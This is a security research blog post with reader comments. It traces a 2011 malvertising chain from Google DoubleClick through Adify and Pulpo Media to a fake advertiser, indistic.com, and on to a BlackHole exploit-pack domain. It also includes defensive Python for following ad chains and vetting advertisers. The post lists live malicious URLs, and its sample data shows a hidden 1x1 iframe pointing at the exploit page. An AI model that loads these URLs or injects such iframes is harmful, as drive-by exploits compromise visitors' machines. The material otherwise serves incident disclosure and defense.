Malvertising on Google DoubleClick ongoing

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

In the past few days, our scanners noticed malvertising on Google DoubleClick. The malvertisement is being provided to DoubleClick by Adify (now part of Cox Digital Solutions), to Adify by Pulpo Media, and to Pulpo Media by the attackers, who are posing as an advertiser under the domain indistic.com. The malvertisement causes visitors' browsers to load exploits from kokojamba.cz.cc (the exploit domain), which is running the BlackHole exploit pack. Currently, 7 out of 44 vendors on VirusTotal detect this malware.

This is our report. We plan to put up the video later; we still need to narrate it, which will take some time. As DoubleClick is a very large ad network, we decided to publish this post quickly.

The first link in the infection chain is the standard tag that every website using Google DoubleClick for Publishers (Google DFP) embeds:

(Link 1:)
<script type='text/javascript' src='hxxp://partner.googleadservices.com/gampad/google_service.js'></script>

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 2:)
http://partner.googleadservices.com/gampad/google_ads.js

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 3:)
http://pubads.g.doubleclick.net/gampad/ads?correlator=1314244145446&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1199834677431615&slotname=LA_PRENSA_Poderes_728x90_Superior&page_slots=LA_PRENSA_Poderes_728x90_Superior&cookie=ID%3D6ece38c99f627779%3AT%3D1314244080%3AS%3DALNI_MbRwmcAoAFohCjkKxnj_JXcxZEUEA&url=http%3A%2F%2Fwww.laprensa.com.ni%2F2011%2F08%2F23%2Fpoderes&lmt=1314244147&dt=1314244147962&cc=100&oe=utf-8&biw=878&bih=477&ifi=1&adk=2910702588&u_tz=480&u_his=2&u_java=true&u_h=1920&u_w=1080&u_ah=1892&u_aw=1080&u_cd=32&flash=10.1.102.64&gads=v2&ga_vid=2122880267.1314244061&ga_sid=1314244061&ga_hid=187578555&ga_fc=true

Which generates a <script src> tag, causing the browser to load javascript from Adify (now part of Cox Digital Solutions):

(Link 4:)
http://ad.afy11.net/srad.js?azId=1000004110207

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 5:)
http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=55943306&rk1=56285031&rk2=1314244149.806&pt=0&asc=3x133&vad=878x477

Which generates an iframe, causing the browser to load an ad frame from tentaculos.net, which is part of Pulpo Media:

(Link 6:)
http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which gives an HTTP 302 redirect to:

(Link 7:)
http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE&ct0=INSERT_CLICKURL_HERE

Which generates a <script src> tag, causing the browser to load javascript from:

(Link 8:)
http://indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917

This is the malicious advertiser. The above javascript generates an iframe, causing the browser to load the exploit domain kokojamba.cz.cc (Link 9-a), and also loads the creative (the banner ad itself) as a .png file (Link 9-b). Here's a snippet of this javascript:


The entire javascript code can be found here.
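To make the eight-hop chain above reproducible offline, here is an added example (not code from the original post or from any of the ad networks named) that walks a captured set of responses the way our scanner would, following document.write'd <script src> tags, iframes and HTTP 302s until it reaches a host it has no capture for, and labels each hop with the party serving it. The response bodies are constructed stand-ins that inject the next hop in the manner the post describes (including the `'<scr'+'ipt'` and `\x3c` string tricks ad scripts commonly use); they are not the real scripts, and the query strings are shortened. The party names are taken from the post's attribution.

```python
"""Walk a captured ad-tag chain offline and label each hop by the party serving it."""
import re
from urllib.parse import urlsplit

# Constructed stand-ins for the hops in the post (NOT the real responses).
# A tuple ("302", location) models an HTTP redirect; anything else is a body.
RESPONSES = {
    "http://partner.googleadservices.com/gampad/google_service.js":
        r'''document.write('<scr'+'ipt src="http://partner.googleadservices.com/gampad/google_ads.js"></scr'+'ipt>');''',
    "http://partner.googleadservices.com/gampad/google_ads.js":
        r'''document.write("\x3cscript src='http://pubads.g.doubleclick.net/gampad/ads?client=ca-pub-1199834677431615'\x3e\x3c/script\x3e");''',
    "http://pubads.g.doubleclick.net/gampad/ads?client=ca-pub-1199834677431615":
        r'''document.write('<script src="http://ad.afy11.net/srad.js?azId=1000004110207"></script>');''',
    "http://ad.afy11.net/srad.js?azId=1000004110207":
        r'''document.write('<script src="http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90"></script>');''',
    "http://ad.afy11.net/ad?asId=1000004110207&sd=2x728x90":
        r'''document.write('<iframe src="http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE" width=728 height=90></iframe>');''',
    "http://d1.tentaculos.net/afr.php?zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE":
        ("302", "http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE"),
    "http://d1.tentaculos.net/afr.php?ct=1&zoneid=2100&cb=INSERT_RANDOM_NUMBER_HERE":
        r'''<html><body><script src="http://indistic.com/media/display/engine/091/impr/j/hd/?campaignid=142038917"></script></body></html>''',
    "http://indistic.com/media/display/engine/091/impr/j/hd/?campaignid=142038917":
        r'''document.write('<iframe src="http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7" width="1" height="1"></iframe>');'''
        r'''document.write('<img src="http://indistic.com/crt/1Npstr/728.PNG" width="728" height="90">');''',
}

# Who serves which host, as attributed in the post.
PARTIES = {
    "partner.googleadservices.com": "Google DFP / DoubleClick",
    "pubads.g.doubleclick.net": "Google DoubleClick",
    "ad.afy11.net": "Adify (Cox Digital Solutions)",
    "d1.tentaculos.net": "Pulpo Media",
    "indistic.com": "advertiser (malicious)",
    "kokojamba.cz.cc": "exploit domain (BlackHole)",
}

_LIT = re.compile(r"'((?:[^'\\]|\\.)*)'" + r'|"((?:[^"\\]|\\.)*)"')          # JS string literals
_ESC = re.compile(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)", re.S)          # JS escape sequences
_SRC = re.compile(r"<(script|iframe|img)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_js_string(lit):
    """Resolve \\xHH, \\uHHHH and simple backslash escapes inside a JS string literal."""
    def sub(m):
        e = m.group(1)
        if e[0] in "xu":
            return chr(int(e[1:], 16))
        return {"n": "\n", "t": "\t", "r": "\r"}.get(e, e)
    return _ESC.sub(sub, lit)


def extract_loads(body):
    """Ordered (tag, url) pairs for the script/iframe/img loads a body would trigger.

    All string literals are decoded and concatenated so that split-literal
    tricks such as '<scr'+'ipt' reassemble into a real tag; the raw body is
    searched too so plain HTML pages work."""
    decoded = "".join(decode_js_string(a or b) for a, b in _LIT.findall(body))
    found = []
    for text in (body, decoded):
        for tag, url in _SRC.findall(text):
            pair = (tag.lower(), url)
            if pair not in found:
                found.append(pair)
    return found


def follow_chain(start, responses, max_hops=50):
    """Depth-first walk from `start`; returns [(kind, url), ...] in load order."""
    chain, seen = [], set()

    def visit(url):
        if url in seen or len(chain) >= max_hops:
            return
        seen.add(url)
        resp = responses.get(url)
        if resp is None:                      # no capture for this URL: leaf (e.g. exploit page)
            return
        if isinstance(resp, tuple) and resp[0] == "302":
            chain.append(("302", resp[1]))
            visit(resp[1])
            return
        for kind, next_url in extract_loads(resp):
            chain.append((kind, next_url))
            if kind in ("script", "iframe"):  # images do not pull further hops
                visit(next_url)

    visit(start)
    return chain


def describe(chain):
    """Annotate each hop with the party behind its host ("unknown" if not mapped)."""
    return [(kind, PARTIES.get(urlsplit(url).hostname, "unknown"), url) for kind, url in chain]


if __name__ == "__main__":
    hops = describe(follow_chain("http://partner.googleadservices.com/gampad/google_service.js", RESPONSES))
    for i, (kind, party, url) in enumerate(hops, 1):
        print(f"{i}. [{kind:6}] {party:30} {url}")
```

The walk yields nine hops ending in the kokojamba.cz.cc iframe and the 728.PNG creative, matching Links 2 through 9-b. In a real capture the redirect and the raw bodies would come from a proxy log or a HAR file rather than the dictionary above.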

The domain "indistic.com" was registered on Aug 12, 2011 (evidence 1) by "Marcene D. Rhodes" (marcenedrhodessm@yahoo.com). The domain currently runs on IP 95.64.46.84 (AS49734), which is located in Romania (thanks to Jason D. Seimesi). The whois record shows a US street address but a Lithuanian (+370) phone number, and the site sits on a Romanian IP (evidence 2):

=====================================
Administrative Contact:
Name: Marcene D. Rhodes
Organization: no
Address: 4653 Twin House Lane
City: Mount Vernon
Province/state: MO
Country: US
Postal Code: 65712
Phone: +370.956734778
Fax: +370.956734778
=====================================

The domain uses FreeDNS (freedns.afraid.org), a free dynamic-DNS service, for its nameservers (evidence 3).

So there were at least three pieces of evidence that indistic.com wasn't a legitimate advertiser: a domain registered less than two weeks earlier, registrant contact details that don't add up, and free dynamic-DNS hosting. This malvertisement shouldn't have been let into this chain of ad networks.

Furthermore, as Jason D. Seimesi pointed out, the same IP also hosts pisofta.com, another domain registered on Aug 12. There is therefore likely more than one malicious advertiser identity associated with this effort.
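The three red flags above, plus the shared-IP observation, are cheap to automate at advertiser intake. The following is an added example (not code from the original post or from any ad network) that encodes them as checks over whois-style records. The indistic.com and pisofta.com records mirror what the post reports; the nameserver hostnames, the pisofta.com contact details, the observation date (Aug 25, 2011, the day of the capture), the 30-day freshness threshold, the calling-code table and the benign comparison record are all assumptions made for the example.

```python
"""Advertiser-intake red-flag checks over constructed whois-style records."""
from datetime import date

# Subset of E.164 country calling codes (assumption: enough for this example;
# a real intake check would use a complete table).
CALLING_CODES = {"1": "US", "40": "RO", "370": "LT", "44": "GB", "49": "DE"}

# Nameserver suffixes of free / dynamic DNS providers. afraid.org is the one
# named in the post; the others are additional assumptions.
FREE_DNS_SUFFIXES = ("afraid.org", "no-ip.com", "dyndns.org")

MAX_DOMAIN_AGE_DAYS = 30        # assumption: anything under a month old is "fresh"
OBSERVED = date(2011, 8, 25)    # assumed capture date, per the request timestamps


def phone_country(phone):
    """Map a whois phone ('+370.956734778' or '+1 417 555 0100') to a country."""
    digits = "".join(ch for ch in phone if ch.isdigit() or ch == ".")
    if "." in digits:                       # whois '+CC.number' form: CC is explicit
        return CALLING_CODES.get(digits.split(".", 1)[0])
    for n in (3, 2, 1):                     # otherwise longest-prefix match
        if digits[:n] in CALLING_CODES:
            return CALLING_CODES[digits[:n]]
    return None


def is_fresh(rec, observed=OBSERVED):
    return (observed - rec["registered"]).days < MAX_DOMAIN_AGE_DAYS


def vet_advertiser(rec, others=(), observed=OBSERVED):
    """Return a list of human-readable red flags for one advertiser domain."""
    flags = []
    age = (observed - rec["registered"]).days
    if age < MAX_DOMAIN_AGE_DAYS:
        flags.append(f"domain registered only {age} days ago")
    pc = phone_country(rec["phone"])
    if pc and pc != rec["registrant_country"]:
        flags.append(f"phone country {pc} != registrant country {rec['registrant_country']}")
    # Hosting abroad is weak on its own (CDNs do it); it only adds weight here.
    if rec["hosting_country"] != rec["registrant_country"]:
        flags.append(f"hosted in {rec['hosting_country']}, registrant in {rec['registrant_country']}")
    if any(ns.endswith(s) for ns in rec["nameservers"] for s in FREE_DNS_SUFFIXES):
        flags.append("nameservers on a free DNS provider")
    siblings = sorted(o["domain"] for o in others
                      if o["ip"] == rec["ip"] and o["domain"] != rec["domain"] and is_fresh(o, observed))
    if siblings:
        flags.append("shares IP with other freshly registered domains: " + ", ".join(siblings))
    return flags


# Constructed records. indistic.com follows the post; the rest is assumed.
INDISTIC = {"domain": "indistic.com", "registered": date(2011, 8, 12), "registrant_country": "US",
            "phone": "+370.956734778", "ip": "95.64.46.84", "hosting_country": "RO",
            "nameservers": ["ns1.afraid.org", "ns2.afraid.org"]}
PISOFTA = {"domain": "pisofta.com", "registered": date(2011, 8, 12), "registrant_country": "US",
           "phone": "+370.956734778", "ip": "95.64.46.84", "hosting_country": "RO",
           "nameservers": ["ns1.afraid.org", "ns2.afraid.org"]}
BENIGN = {"domain": "example-advertiser.com", "registered": date(2008, 3, 1), "registrant_country": "US",
          "phone": "+1.4175550100", "ip": "198.51.100.7", "hosting_country": "US",
          "nameservers": ["ns1.example-advertiser.com", "ns2.example-advertiser.com"]}

KNOWN = [INDISTIC, PISOFTA, BENIGN]


if __name__ == "__main__":
    for rec in KNOWN:
        print(rec["domain"], "->", vet_advertiser(rec, KNOWN) or ["no flags"])
```

indistic.com trips all five checks while the benign record trips none; any one flag alone (a young domain, say) is not proof of malice, which is why the function returns the full list rather than a verdict.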

(Link 9-a, BlackHole exploit pack:)
http://kokojamba.cz.cc/index.php?tp=2733de342143bbc7

kokojamba.cz.cc is the exploit domain running the BlackHole exploit pack. At the time of writing we observed it on IP 178.238.36.64, located in Jihomoravský kraj (South Moravia), Czech Republic. (Commenters below note that 178.238.36.64 is in fact ns2.cz.cc, one of the cz.cc nameservers, and that kokojamba.cz.cc itself was hosted on 188.229.89.240.)

(Link 9-b:)
http://indistic.com/crt/1Npstr/728.PNG

Currently, 7 out of 44 vendors on VirusTotal detect this malware.

We are in the process of informing all parties involved. If you know more about this incident, please email us at wayne@armorize.com

12 comments:

Jason D.Seimesi said...

Here's some other URLs to mull over:
indistic.com/counterjs.php?id=111818918
indistic.com/counterjs.php?id=111957518
indistic.com/counterjs.php?id=142038917
indistic.com/crt/1Npstr/160.PNG
indistic.com/crt/1Npstr/300.PNG
indistic.com/crt/1Npstr/728.PNG
indistic.com/crt/Depositphotos/deposit_300x250_v2.jpg
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=111818918
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=111957518
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=132528216
indistic.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=142038917
pisofta.com/crt/Depositphotos/deposit_300x250_v2.jpg
pisofta.com/media/display/engine/091/impr/j/hd/?gfb=178k1&tprk=837168u&campaignid=84230724

Jason D.Seimesi said...

Incidentally, I'm seeing 95.64.46.84 as the IP for both indistic.com and pisofta.com.

Wayne Huang said...

Thanks Jason, will look into it.

Wayne Huang said...

Thank you Jason, updated blog post and credit you. Search for your name to see updates.

Jason D.Seimesi said...

I haven't seen the kokojamba.cz.cc (178.238.36.64) come up, but I bet you that they've moved the exploit pack to 188.229.89.240.

Wayne Huang said...

Interesting, how do you know?

Anonymous said...

178.238.36.64 is just the DNS server.

ns2.cz.cc [178.238.36.64]
ns1.cz.cc [178.238.36.6]

kokojamba.cz.cc is on the ip 188.229.89.240

Enth said...

178.238.36.64 is just one of the DNS servers.

188.229.89.240 is the kokojamba.cz.cc domain's IP.
